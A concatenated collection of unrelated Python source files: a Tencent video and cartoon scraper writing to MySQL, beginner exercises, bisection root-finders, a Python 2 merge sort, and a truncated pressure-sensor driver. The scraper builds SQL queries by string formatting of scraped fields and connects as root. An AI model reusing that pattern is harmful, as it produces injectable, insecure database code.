                # Title
try:
title = figure_detail.find('a').text
except Exception as e:
title = ''
                # Play page URL
try:
href = figure_detail.find('a')['href']
except Exception as e:
href = ''
title = pymysql.escape_string(str(title))
print("缩略图地址:",pic," 电影名称:",title," 别名 ",second_title," 播放地址:",href," 集数:",sets)
                # Check for an existing record with the same title
sql = "SELECT id,title,sets_state FROM tp_vcate where title='%s'"
tdata = (title)
cursor.execute(sql % tdata)
updateID = ""
print("查询到" + str(cursor.rowcount) + "条与标题 " + title +" 一致的数据")
if(cursor.rowcount > 0):
fetch = cursor.fetchone()
updateID = fetch[0]
updatestate = fetch[2]
if(updatestate == 0):
try:
sql = "UPDATE tp_vcate set title = '%s', second_title = '%s', pic = '%s', sets = '%s', sets_state = '%d', url = '%s',cateid = '%d' where id = '%d'"
sets_state = 0
matchObj = re.match( r'全(.*)', sets, re.M|re.I)
if matchObj:
sets_state = 1
else:
sets_state = 0
data = (title, second_title, pic, sets, sets_state, href, iarea + 1,updateID)
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print(e)
continue
continue
else:
                    # Insert a new record
try:
sql = "INSERT INTO tp_vcate (title, second_title, pic, sets, sets_state, url ,cateid) \
VALUES ( '%s', '%s','%s','%s','%d','%s' ,'%d')"
sets_state = 0
matchObj = re.match( r'全(.*)', sets, re.M|re.I)
if matchObj:
sets_state = 1
else:
sets_state = 0
data = (title, second_title, pic, sets, sets_state, href, iarea + 1)
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print(e)
continue
if __name__ == "__main__":
main = Main()
main.getCateID()
# Close the connection
cursor.close()
connect.close()
```
#### File: 国内视频站/腾讯动漫采集/PlayList.py
```python
import requests
import re
import sys
import time
import pymysql
import demjson
import json
import random
from bs4 import BeautifulSoup
# Connect to the database
connect = pymysql.Connect(
host = 'localhost',
port = 3306,
user = 'root',
passwd = '<PASSWORD>',
db = 'blog',
charset = 'utf8'
)
# Get a cursor
cursor = connect.cursor()
class PlayList:
user_agent_list = ['Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36']
UserAgent=random.choice(user_agent_list)
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': UserAgent,
}
tuple_list=[]
vcate_id = ""
def __init__(self):
        # Query the database for entries to refresh (intended: series that are not yet completed)
sql = "SELECT * FROM tp_vcate"
cursor.execute(sql)
for row in cursor.fetchall():
self.vcate_id = row[0]
title = row[1]
url = row[6]
            # Open the page
try:
r = requests.get(url, headers=self.header, timeout=5)
except Exception as e:
f=open('链接打开错误.txt','a')
f.write('打开连接失败:' + url + '\n')
f.close()
print('打开播放页失败:',e)
if r.status_code != 200:
f=open('链接打开错误.txt','a')
f.write('返回错误代码:' + url + str(r.status_code) + '\n')
f.close()
print('页面打开错误',str(r.status_code),url)
continue
#print("链接状态:",r.status_code)
r.encoding = 'utf-8'
            # Extract the JSON blob with a regex
cover = ''
searchObj = re.search( 'var COVER_INFO =(.*)',r.text, re.M|re.I)
if searchObj:
cover = searchObj.group(1)
else:
f=open('链接打开错误.txt','a')
f.write('没有找到JSON:' + url + '\n')
f.close()
print ("没有找到 cover JSON")
continue
try:
cover_info = demjson.decode(cover)
self.hasKey(cover_info)
except Exception as e:
f=open('json错误.txt','a')
f.write('解析JSON错误:' + url + '\n')
f.close()
print ("解析JSON错误 "+ url )
continue
# return
            # Query the database
sql = "SELECT * FROM tp_pcate where vcate_id = '%s'"
tdata = (self.vcate_id)
cursor.execute(sql % tdata)
updateID = ""
print(cursor.rowcount)
if(cursor.rowcount > 0):
updateID = cursor.fetchone()[0]
self.tuple_list.append( updateID )
data = tuple(self.tuple_list)
print(url,"更新数据",cover_info['series_name'],title)
sql = "UPDATE tp_pcate set source = '%s', vcate_id = '%d', pageid = '%s', leading_actor_id = '%s', second_title = '%s', publish_date = '%s', current_num = '%s', type_name = '%s', \
horizontal_pic_url = '%s', cartoon_age = '%s', area_name = '%s', tag = '%s',doulie_tags = '%s', series_name = '%s', vertical_pic_url = '%s', director_id = '%s', description = '%s', \
dialogue = '%s', update_notify_desc = '%s', episode_updated = '%s', score = '%s', nomal_ids = '%s',view_today_count = '%d' where id='%d'"
try:
cursor.execute(sql % data)
connect.commit()
continue
except Exception as e:
print("更新数据库失败" ,e)
f=open('1.txt','a')
f.write(pymysql.escape_string(cover_info['series_name'])+"\n")
f.close()
continue
else:
data = tuple(self.tuple_list)
                # Insert a new record
sql = "INSERT INTO tp_pcate(source, vcate_id, pageid, leading_actor_id, second_title, publish_date, current_num, type_name, horizontal_pic_url, cartoon_age, area_name, tag,\
doulie_tags, series_name, vertical_pic_url, director_id, description, dialogue, update_notify_desc, episode_updated, score, nomal_ids,view_today_count) VALUES\
('%s','%d', '%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%d')"
print(url,"写入数据",cover_info['series_name'],title)
try:
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print("写入数据库失败" ,e)
f=open('1.txt','a')
f.write(pymysql.escape_string(cover_info['series_name'])+"\n")
f.close()
print(data)
continue
def setEscape(self,data):
if(type(data) == str or type(data) == int):
return data
return json.dumps( data ,ensure_ascii=False)
def hasKey(self,dicts):
source = "v.qq.com"
key = ['id','leading_actor_id','second_title','publish_date','current_num','type_name','horizontal_pic_url','cartoon_age','area_name','tag',\
'doulie_tags','title','vertical_pic_url','director_id','description','dialogue','update_notify_desc','episode_updated','score','nomal_ids','view_today_count',]
self.tuple_list=[source,self.vcate_id]
for i in range(0,len(key)):
            # Check whether the dict contains the key
if(key[i] in dicts.keys()):
self.tuple_list.append( self.setEscape( dicts[key[i]] ) )
else:
self.tuple_list.append( None )
if __name__ == "__main__":
playlist = PlayList()
# Close the connection
cursor.close()
connect.close()
``` |
{
"source": "8055aa/Python3Code",
"score": 3
} |
#### File: 8055aa/Python3Code/hello2.py
```python
"I am : doestr.__doc__"
import imp
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import calendar
message = "After editing"
def printer():
print('reloaded:',message)
def func(spam, eggs=0, toast = 0, ham = 0):
print(spam, eggs, toast, ham)
def indirect(func, arg):
func(arg)
def intersect(*args):
res = []
for x in args[0]:
for other in args[1:]:
if x not in other :break
else:
res.append(x)
return res
def union(*args):
res = []
for seq in args:
for x in seq:
if not x in res:
res.append(x)
return res
def outer(x):
global inner
def inner(i):
print(i)
if i : inner(i - 1)
inner(x)
class FirstClass:
def setdata(self, value):
self.data = value
def display(self):
print(self.data)
class SecondClass(FirstClass):
def display(self):
print('Current value = {0}'.format(self.data))
class ThirdClass(SecondClass):
def __init__(self, value):
self.data = value
def __add__(self, other):
return ThirdClass(self.data + other)
def __mul__(self, other):
self.data = self.data * other
class Subclass():
data = 'SPAM'
def __init__(self, value):
self.data = value
def display(self):
print(self.data, Subclass.data)
def factory(aClass, *args):
    return aClass(*args)  # apply() no longer exists in Python 3; call the class directly
class Spam:
"I am: spam.__doc__ or docstr.spam.__doc__"
def doit(self, message):
print(message)
def method(self, arg):
"I am: spam.method.__doc__ or self.method.__doc__"
pass
def func(args):
"I am: docstr.func.__doc__"
pass
class Person:
def __init__(self, name, job):
self.name = name
self.job = job
if __name__ == '__main__':
print('This program is being run by itself')
'''
table = {'Python': '<NAME>', 'Perl':'<NAME>', 'Tcl': '<NAME>'}
language = 'Python'
creator = table[language]
print(creator)
for lang in table.keys():
print(" {0}'s creator is : {1}".format(lang, table[lang]))
'''
    '''
    '''
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 16:17:13 2015
@author: Eddy_zheng
"""
from matplotlib import pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
X = np.arange(-4, 4, 0.25)
Y = np.arange(-4, 4, 0.25)
X, Y = np.meshgrid(X, Y)
R = np.sqrt(X ** 2 + Y ** 2)
Z = np.sin(R)
# 具体函数方法可用 help(function) 查看,如:help(ax.plot_surface)
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap='rainbow')
plt.show()
'''
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 16:37:21 2015
@author: Eddy_zheng
"""
''''
data = np.random.randint(0, 255, size=[40, 40, 40])
x, y, z = data[0], data[1], data[2]
ax = plt.subplot(111, projection='3d') # 创建一个三维的绘图工程
# 将数据点分成三部分画,在颜色上有区分度
ax.scatter(x[:10], y[:10], z[:10], c='y') # 绘制数据点
ax.scatter(x[10:20], y[10:20], z[10:20], c='r')
ax.scatter(x[30:40], y[30:40], z[30:40], c='g')
ax.set_zlabel('Z') # 坐标轴
ax.set_ylabel('Y')
ax.set_xlabel('X')
plt.show()
'''
# !/usr/bin/python3
print("我的姓名是{0},年龄是{1}".format("杨萌青","20"))
else:
print("I am being imported from another module")
print('Done')
```
#### File: 8055aa/Python3Code/inputKeyboardInterrupt.py
```python
import cmath
import random
import sys
__author__ = '<NAME>'
__project__ = 'This is My Simple Python Application '
'''
a = float(input('输入三角形第一边长:'))
b = float(input('输入三角形第二边长:'))
c = float(input('输入三角形第三边长:'))
while a + b <= c or a + c <= b or b + c <= a:
print('输入的边构不成三角形,请重新输入!!')
a = float(input('输入三角形第一边长:'))
b = float(input('输入三角形第二边长:'))
c = float(input('输入三角形第三边长:'))
s = (a + b + c) / 2
area = (s * (s - a) * (s - b) * (s - c)) ** 0.5
print('三角形的面积为: %0.2f' % area) '''
# print(random.randint(0, 9))
'''
num = int(input('请输入一个数字:'))
if(num % 2) == 0:
print('{0} 是偶数'.format(num))
else:
print('{0} 是奇数'.format(num)) '''
# Python program to check whether the number entered by the user is prime
'''
# 用户输入数字
num = int(input("请输入一个数字: "))
# 质数大于 1
if num > 1:
# 查看因子
for i in range(2, num):
if (num % i) == 0:
print(num, "不是质数")
print(i, "乘于", num // i, "是", num)
break
else:
print(num, "是质数")
# 如果输入的数字小于或等于 1,不是质数
else:
print(num, "不是质数") '''
list1 = ['Google', 'Runoob', 1997, 2000]
list2 = [1, 2, 3, 4, 5, 1, 1, 1, 2]
list3 = ["a", "b", "c", "d"]
tup1 = ('Google', 'Runoob', 1997, 2000)
tup2 = (1, 2, 3, 4, 5)
tup3 = "a", "b", "c", "d"
dict1 = {'Alice': '2341', 'Beth': '9102', 'Cecil': '3258'}
dict2 = {'abc': 987}
def area(width, height):
return width * height
def print_welcome(name):
print("Welcome {0} !!!!!!".format(name))
def ChangeInt(a):
a = 10
print(a)
def printinfo(arg1, *vartuple):
"打印任何传入的参数"
print("输出:")
print(arg1)
for var in vartuple:
print(var)
return
def outer():
num = 10
def inner():
nonlocal num
num = 200
print(num)
inner()
print(num)
def change_me(mylist):
mylist = [1, 2, 3, 4, 5]
print("函数内取值:", mylist)
return
def fab(max):
n, a, b = 0, 0, 1
while n < max:
yield b
a, b = b, a + b
n = n + 1
class FirstClass:
def setdata(self, value):
self.data = value
def display(self):
print(self.data)
if __name__ == '__main__':
    print('The program is running by itself')
for i in range(1, 10):
for j in range(1, i + 1):
print('{0} x {1} = {2}\t'.format(j, i , i*j), end =' ')
print()
else:
    print('I am being imported from another module')
``` |
{
"source": "8059542577066/Bisecting-float-Algorithms-in-Python-3",
"score": 3
} |
#### File: 8059542577066/Bisecting-float-Algorithms-in-Python-3/functions.py
```python
def golden():
x, m = 1, 1 / 2
while x + m != x - m:
if x ** 2 - x - 1 < 0:
x += m
else:
x -= m
m /= 2
return x
def plastic():
x, m = 1, 1 / 2
while x + m != x - m:
if x ** 3 - x - 1 < 0:
x += m
else:
x -= m
m /= 2
return x
def pentagon():
x, m = 1, 1 / 2
while x + m != x - m:
if 256 * x ** 4 - 800 * x ** 2 + 125 < 0:
x += m
else:
x -= m
m /= 2
return x
def hexagon():
x, m = 2, 1 / 2
while x + m != x - m:
if 4 * x ** 2 - 27 < 0:
x += m
else:
x -= m
m /= 2
return x
def sqrt(n):
x = 1
while x ** 2 < n:
x *= 2
m = x / 2
while x + m != x - m:
if x ** 2 < n:
x += m
else:
x -= m
m /= 2
return x
def cbrt(n):
x = 1
while x ** 3 < n:
x *= 2
m = x / 2
while x + m != x - m:
if x ** 3 < n:
x += m
else:
x -= m
m /= 2
return x
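# Illustrative usage (not part of the original file): each loop bisects until
# the half-step underflows relative to x, so the results match the closed
# forms below to double precision.
if __name__ == "__main__":
    print(golden())      # ~1.618033988749895, i.e. (1 + 5 ** 0.5) / 2
    print(plastic())     # ~1.324717957244746, the real root of x**3 = x + 1
    print(sqrt(2) ** 2)  # ~2.0
    print(cbrt(27))      # ~3.0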
``` |
{
"source": "8059542577066/Heap-Sort-Merge-Sort-and-Binary-Search",
"score": 4
} |
#### File: 8059542577066/Heap-Sort-Merge-Sort-and-Binary-Search/Merge Sort.py
```python
import random
def sort(array, e1, e2):
m1 = (e1 + e2) / 2
m2 = m1 + 1
if e1 != m1:
sort(array, e1, m1)
sort(array, m2, e2)
temp = []
i1 = e1
i2 = m2
while i1 <= m1 and i2 <= e2:
if array[i1] <= array[i2]:
temp.append(array[i1])
i1 += 1
else:
temp.append(array[i2])
i2 += 1
if i1 > m1:
while i2 <= e2:
temp.append(array[i2])
i2 += 1
else:
while i1 <= m1:
temp.append(array[i1])
i1 += 1
for i in xrange(len(temp)):
array[e1 + i] = temp[i]
def main():
print "Merge Sort"
count = int(raw_input("Number of Items: "))
numbers = []
for i in xrange(count):
numbers.append(random.getrandbits(64))
print "\nBefore Sorting:"
print "numbers == sorted(numbers): " + str(numbers == sorted(numbers))
sort(numbers, 0, len(numbers) - 1)
print "\nAfter Sorting:"
print "numbers == sorted(numbers): " + str(numbers == sorted(numbers))
raw_input()
if __name__ == "__main__":
main()
``` |
{
"source": "805bluebell/DS-alogs-practice",
"score": 3
} |
#### File: DS-alogs-practice/graph/dfs.py
```python
gg = {
'a':['b', 'c'],
'b':['c', 'd'],
'c':['d'],
'd':['c'],
'e':['f'],
'f':['c']
}
g = {
'u': ['x', 'v', 'p'],
'x': ['v', 'q'],
'v': ['y'],
'y': ['x'],
'w': ['y', 'z'],
'z': ['z'],
'p': [],
'q': []
}
discovery = dict()
for k, v in g.items():
discovery[k] = False
# print(discovery)
def dfs(g, v):
discovery[v] = True
print(v, end=" ")
for ichi in g[v]:
if not discovery[ichi]:
dfs(g, ichi)
dfs(g, 'w')
```
#### File: DS-alogs-practice/recursion_dynamic_programming/insertAt_bottomOf_stack.py
```python
class item:
def __init__(self, value, next):
self.value = value
self.next = next
class stack:
def __init__(self, top, height):
self.top = top
self.height = height
    def pussh(self, a):
        self.top = item(a, self.top)
        self.height += 1
    def popp(self):
        t = self.top.value
        self.top = self.top.next
        self.height -= 1
        return t
    def iterate(self):
        curr = self.top
        while curr is not None:
            print(curr.value, end=" ")
            curr = curr.next
        print()
    # Inserting at bottom of stack
    # Although that's not a normal operation for stack
    # But it's recommended exercise from byte-by-byte for recursion
    def helper(self, curr, a):
        if curr.next is None:
            curr.next = item(a, None)
        else:
            self.helper(curr.next, a)
    def insertBottom(self, a):
        if self.top is None:
            self.pussh(a)
            return
        self.helper(self.top, a)
        self.height += 1
myStack = stack(None, 0)
for i in range(6):
myStack.pussh(i)
myStack.insertBottom(67)
myStack.iterate()
```
#### File: DS-alogs-practice/sorting/bubbleSort.py
```python
def bubbleSort(box):
for e in range(len(box)):
for i in range(len(box)):
if i+1 < len(box):
if box[i] > box[i+1]:
temp = box[i]
box[i] = box[i+1]
box[i+1] = temp
arr = [29, 64, 73, 34, 20, -9, 23]
bubbleSort(arr)
print(arr)
```
#### File: DS-alogs-practice/sorting/selectionSort.py
```python
def selectionSort(box):
for i in range(len(box)):
mini = i
for j in range(i+1, len(box)):
if box[j] < box[mini]:
mini = j
temp = box[i]
box[i] = box[mini]
box[mini] = temp
arr = [29, 64, 73, 34, 20, -9, 23]
selectionSort(arr)
print(arr)
``` |
{
"source": "807782352/Robomaster-CV",
"score": 3
} |
#### File: Robomaster-CV/RM_CV/myFunc.py
```python
import cv2
def cv_show(name,img):
cv2.imshow(name, img)
cv2.waitKey(0)
cv2.destroyAllWindows()
``` |
{
"source": "8081594571/bgtools_web",
"score": 2
} |
#### File: 8081594571/bgtools_web/fabfile.py
```python
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
"""
Render and upload a template text file to a remote host.
"""
text = None
template_dir = template_dir or os.getcwd()
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
context = context if context is not None else {}
text = jenv.get_template(filename).render(**context)
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
# text = text.encode('utf-8')
# Upload the file.
return c.put(
StringIO(text),
destination,
)
def venv(c):
"""
Runs a command in a virtualenv (which has been specified using
the virtualenv context manager
"""
return c.prefix("source {}/bin/activate".format(c.config.bgtools.VENV_DIR))
def install_dependencies(c):
ensure_virtualenv(c)
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run("pip install -U -r requirements.txt")
def file_exists(c, path):
    result = c.run('stat {}'.format(path), hide=True, warn=True)
    print('checking existence of: {}: {}'.format(path, result.ok))
    return result.ok
def ensure_virtualenv(c):
args = c.config.bgtools
ensure_dir(c, args.SRC_DIR)
if file_exists(c, args.VENV_DIR):
return
with c.cd(args.DJANGO_APP_ROOT):
c.run("virtualenv --no-site-packages --python={} {}".format(
args.PYTHON_BIN, args.venv_subdir))
c.run("echo {} > {}/lib/{}/site-packages/projectsource.pth".format(
args.SRC_DIR, args.venv_subdir, args.PYTHON_BIN))
def ensure_dir(c, d):
print('checking existence of {} on {}'.format(d, c))
if not file_exists(c, d):
# note that the parent directory needs to already exist, usually by making a custom app
# with the correct name in the webfaction control panel
print('making {}'.format(d))
c.run("mkdir -p {}".format(d))
def copy_settings(c):
args = c.config.bgtools
with c.cd(args.LOCAL_DIR):
fname = 'settings_{}.py'.format(args.mode)
c.local('cp {} bgtools/bgtools/private_settings.py'.format(fname))
c.local('echo STAGING={} >> bgtools/bgtools/private_settings.py'.format('True' if args.staging else False))
def rsync(c, src, dest):
args = c.config.bgtools
c.local('rsync -avz {} {}:{}'.format(src,
args.host,
dest))
def rsync_source(c):
"""
rsync the source over to the server
"""
args = c.config.bgtools
rsync(c, os.path.join(args.LOCAL_DIR, 'bgtools'), args.DJANGO_APP_ROOT)
def collect_static(c):
"""
Collect django static content on server
"""
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run('python manage.py collectstatic --no-input')
def checkout_and_install_libs(c):
args = c.config.bgtools
libs = json.load(open('libs.json'))
ensure_dir(c, args.CHECKOUT_DIR)
with c.cd(args.CHECKOUT_DIR):
for lib, params in libs.items():
print('handling ' + lib)
libdir = params['repo']
if libdir != 'local':
params['branch'] = args.branch
else:
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(params['path'], params['name']),
args.CHECKOUT_DIR)
with c.cd(params['name']), venv(c):
c.run('pip install -U .')
continue
github_url = 'https://github.com/{}/{}'.format(params['owner'], params['repo'])
if not file_exists(c, libdir):
c.run('git clone {}.git'.format(github_url))
with c.cd(libdir):
c.run('git fetch origin')
if args.mode == 'debug' or args.tag == 'head':
c.run('git checkout {}'.format(params['branch']))
c.run('git pull')
version = c.run('git rev-parse {}'.format(params['branch'])).stdout
version_url = '{}/commits/{}'.format(github_url, version)
elif args.mode == 'release':
tag = args.tag
if tag == 'latest':
tag = c.run('git tag -l "v*" --sort=-v:refname').stdout.split()[0]
c.run('git checkout {}'.format(tag))
version = tag
version_url = '{}/releases/tag/{}'.format(github_url, tag)
for src, target in params.get('extras', []):
with c.cd(args.LOCAL_DIR):
rsync(c, posixpath.join(args.LOCAL_DIR, 'extras', lib, src),
posixpath.join(args.CHECKOUT_DIR, libdir, target))
with venv(c):
c.run('pip install -U .')
with c.cd(args.SRC_DIR):
r = requests.get('https://api.github.com/repos/{}/{}/releases'.format(params['owner'],
params['repo']))
changelog = r.json()
changelog = [{'url': ch['html_url'],
'date': dt.datetime.strptime(ch['published_at'][:10], '%Y-%m-%d').date(),
'name': ch['name'],
'tag': ch['tag_name'],
'description': ch['body']}
for ch in changelog]
for tname, context in [('version', {'version': version, 'url': version_url}),
('changelog', {'changelog': changelog})]:
print('uploading {}_{}.html'.format(lib, tname))
upload_template(c, '{}_template.html'.format(tname),
posixpath.join(args.SRC_DIR,
DJANGO_APP_NAME,
'templates',
DJANGO_APP_NAME,
'{}_{}.html'.format(lib, tname)),
context=context,
template_dir=posixpath.join(args.LOCAL_DIR, 'templates'))
@fabric.task
def stop_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Stop the webserver that is running the Django instance
"""
populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
c.run("kill $(cat {})".format(c.config.bgtools.GUNICORN_PIDFILE))
def _webserver_command(c):
args = c.config.bgtools
return ('{venv_dir}/bin/gunicorn '
'--error-logfile={error_logfile} '
'--access-logfile={access_logfile} '
'--capture-output '
'-b 127.0.0.1:{port} '
'-D -w {workers} --pid {pidfile} '
'{wsgimodule}:application').format(
**{'venv_dir': args.VENV_DIR,
'pidfile': args.GUNICORN_PIDFILE,
'wsgimodule': args.WSGI_MODULE,
'port': APP_PORT if not args.staging else STAGING_APP_PORT,
'workers': GUNICORN_WORKERS,
'error_logfile': args.GUNICORN_ERROR_LOGFILE,
'access_logfile': args.GUNICORN_ACCESS_LOGFILE}
)
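# For illustration (not part of the original file), with the settings above the
# rendered command looks roughly like:
#   <venv>/bin/gunicorn --error-logfile=<logs>/gunicorn_error_<project>.log
#   --access-logfile=<logs>/gunicorn_access_<project>.log --capture-output
#   -b 127.0.0.1:<port> -D -w <workers> --pid <app_root>/gunicorn.pid
#   <project>.wsgi:application
# where the placeholders are filled in from fabsettings and populate_args().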
@fabric.task
def start_webserver(c, mode='debug', tag='latest', staging=True, branch='master'):
"""
Starts the webserver that is running the Django instance
"""
populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
start_webserver_internal(c)
def start_webserver_internal(c):
print('starting new webserver: "{}"'.format(_webserver_command(c)))
with c.cd(c.config.bgtools.SRC_DIR):
c.run(_webserver_command(c), pty=False, echo=True)
@fabric.task(hosts=[HOST])
def restart_webserver(c, mode=None, tag=None, staging=None, branch=None):
"""
Restarts the webserver that is running the Django instance
"""
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
restart_webserver_internal(c)
def restart_webserver_internal(c):
args = c.config.bgtools
if file_exists(c, args.GUNICORN_PIDFILE):
print('killing existing webserver')
c.run("kill -HUP $(cat {})".format(args.GUNICORN_PIDFILE), echo=True)
else:
start_webserver_internal(c)
def populate_arg(args, existing, argname):
return existing if existing is not None else args[argname]
def populate_args(c, **kwargs):
args = c.config.bgtools
# env.use_ssh_config = True
for k, v in kwargs.items():
print('setting {} to {}'.format(k, populate_arg(args, v, k)))
setattr(args, k, populate_arg(args, v, k))
project = DJANGO_PROJECT_NAME
if args.staging:
project += '_staging'
args.DJANGO_APP_ROOT = posixpath.join(DJANGO_APPS_DIR, project)
# Python version
args.PYTHON_BIN = "python3.5"
# env.PYTHON_PREFIX = "" # e.g. /usr/local Use "" for automatic
# env.PYTHON_FULL_PATH = (posixpath.join(env.PYTHON_PREFIX, 'bin', env.PYTHON_BIN)
# if env.PYTHON_PREFIX else env.PYTHON_BIN)
args.GUNICORN_PIDFILE = posixpath.join(args.DJANGO_APP_ROOT, 'gunicorn.pid')
args.GUNICORN_ERROR_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_error_{}.log'.format(project))
args.GUNICORN_ACCESS_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_access_{}.log'.format(project))
args.SRC_DIR = posixpath.join(args.DJANGO_APP_ROOT, DJANGO_PROJECT_NAME)
args.VENV_DIR = posixpath.join(args.DJANGO_APP_ROOT, args.venv_subdir)
args.CHECKOUT_DIR = posixpath.join(args.DJANGO_APP_ROOT, 'checkouts')
args.WSGI_MODULE = '{}.wsgi'.format(DJANGO_PROJECT_NAME)
args.LOCAL_DIR = os.path.dirname(os.path.realpath(__file__))
@fabric.task(hosts=[HOST])
def deploy(c, mode=None, staging=True, tag=None, branch=None):
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
print(c.config.bgtools)
copy_settings(c)
rsync_source(c)
install_dependencies(c)
checkout_and_install_libs(c)
collect_static(c)
restart_webserver_internal(c)
``` |
{
"source": "808brick/KellerLD-python",
"score": 3
} |
#### File: 808brick/KellerLD-python/kellerLD.py
```python
import time
import smbus
import struct
import os
class KellerLD(object):
_SLAVE_ADDRESS = 0x40
_REQUEST_MEASUREMENT = 0xAC
_DEBUG = False
_P_MODES = (
"PA Mode, Vented Gauge", # Zero at atmospheric pressure
"PR Mode, Sealed Gauge", # Zero at 1.0 bar
"PAA Mode, Absolute Gauge" # Zero at vacuum
)
_P_MODE_OFFSETS = (1.01325, 1.0, 0.0)
PRESSURE_CONVERSION = {
"Pa" : 100000,
"mbar" : 1000,
"bar" : 1,
}
def __init__(self, bus=1):
        self._bus = None
        self._fluid_density = 1029  # kg/m^3
        self._pressure = None
        self._temperature = None
        self._depth = None
        self._altitude = None
        self.pMin = None
        self.pMax = None
try:
self._bus = smbus.SMBus(bus)
except:
print("Bus %d is not available.") % bus
print("Available busses are listed as /dev/i2c*")
if os.uname()[1] == 'raspberrypi':
print("Enable the i2c interface using raspi-config!")
def init(self):
if self._bus is None:
print("No bus!")
return False
# Read out pressure-mode to determine relevant offset
self._bus.write_byte(self._SLAVE_ADDRESS, 0x12)
time.sleep(0.001)
# read three bytes (status, P MSB, P LSB)
# status byte should be 0b01BMoEXX, where
# B=(0: conversion complete, 1:busy),
# Mo=(00:normal mode, 01:command mode, 1X: reserved)
# E=(0:checksum okay, 1:memory error)
# X=(don't care)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
scaling0 = data[1] << 8 | data[2]
self.debug(("0x12:", scaling0, data))
pModeID = scaling0 & 0b11
self.pMode = self._P_MODES[pModeID]
self.pModeOffset = self._P_MODE_OFFSETS[pModeID]
self.debug(("pMode", self.pMode, "pressure offset [bar]", self.pModeOffset))
self.year = scaling0 >> 11
self.month = (scaling0 & 0b0000011110000000) >> 7
self.day = (scaling0 & 0b0000000001111100) >> 2
self.debug(("calibration date", self.year, self.month, self.day))
# Read out minimum pressure reading
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x13)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
MSWord = data[1] << 8 | data[2]
self.debug(("0x13:", MSWord, data))
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x14)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
LSWord = data[1] << 8 | data[2]
self.debug(("0x14:", LSWord, data))
self.pMin = MSWord << 16 | LSWord
self.debug(("pMin", self.pMin))
# Read out maximum pressure reading
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x15)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
MSWord = data[1] << 8 | data[2]
self.debug(("0x15:", MSWord, data))
time.sleep(0.001)
self._bus.write_byte(self._SLAVE_ADDRESS, 0x16)
time.sleep(0.001)
data = self._bus.read_i2c_block_data(self._SLAVE_ADDRESS, 0, 3)
LSWord = data[1] << 8 | data[2]
self.debug(("0x16:", LSWord, data))
self.pMax = MSWord << 16 | LSWord
self.debug(("pMax", self.pMax))
# 'I' for 32bit unsigned int
self.pMin = struct.unpack('f', struct.pack('I', self.pMin))[0]
self.pMax = struct.unpack('f', struct.pack('I', self.pMax))[0]
self.debug(("pMin:", self.pMin, "pMax:", self.pMax))
return True
def read(self):
if self._bus is None:
print("No bus!")
return False
if self.pMin is None or self.pMax is None:
print("Init required!")
